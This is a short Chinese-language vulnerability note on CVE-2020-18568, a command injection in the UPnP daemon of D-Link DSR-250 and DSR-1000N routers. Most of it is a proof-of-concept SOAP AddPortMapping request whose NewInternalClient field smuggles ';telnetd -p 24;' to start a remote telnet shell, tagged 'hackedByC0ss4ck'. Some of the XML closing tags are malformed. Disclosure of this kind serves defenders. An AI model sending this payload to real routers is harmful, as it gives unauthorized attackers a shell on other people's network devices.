# D-Link DSR-250 DSR-1000N 命令注入（CVE-2020-18568）

影响版本：DSR-250（3.14）DSR-1000N（2.11B201）

固件包中有一个upnpd程序，该程序在0.0.0.0上侦听端口1900（udp）和49152（tcp）。通过逆向分析，当程序设置iptable时，未检查参数，这可能导致命令注入。

**PoC：**


```xml
POST /upnp/control/WANIPConn1 HTTP/1.1
HOST: $control_host:$control_port
Content-Length: $content_length
Content-Type: text/xml; charset="utf-8"
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <s:Body>
  <u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
   <NewExternalPort>7331</NewExternalPort>
   <NewProtocol>tcp<NewProtocol/>
   <NewInternalPort>1337<NewInternalPort/>
   <NewLeaseDuration><NewLeaseDuration/>
   <NewEnabled>1<NewEnabled/>
   <NewPortMappingDescription>hackedByC0ss4ck<NewPortMappingDescription/>
   <NewRemoteHost>0.0.0.0<NewRemoteHost/>
   <NewInternalClient>;telnetd -p 24;<NewInternalClient/>
  </u:AddPortMapping>
 </s:Body>
</s:Envelope>
```

ref：

* https://nvd.nist.gov/vuln/detail/CVE-2020-18568
* https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a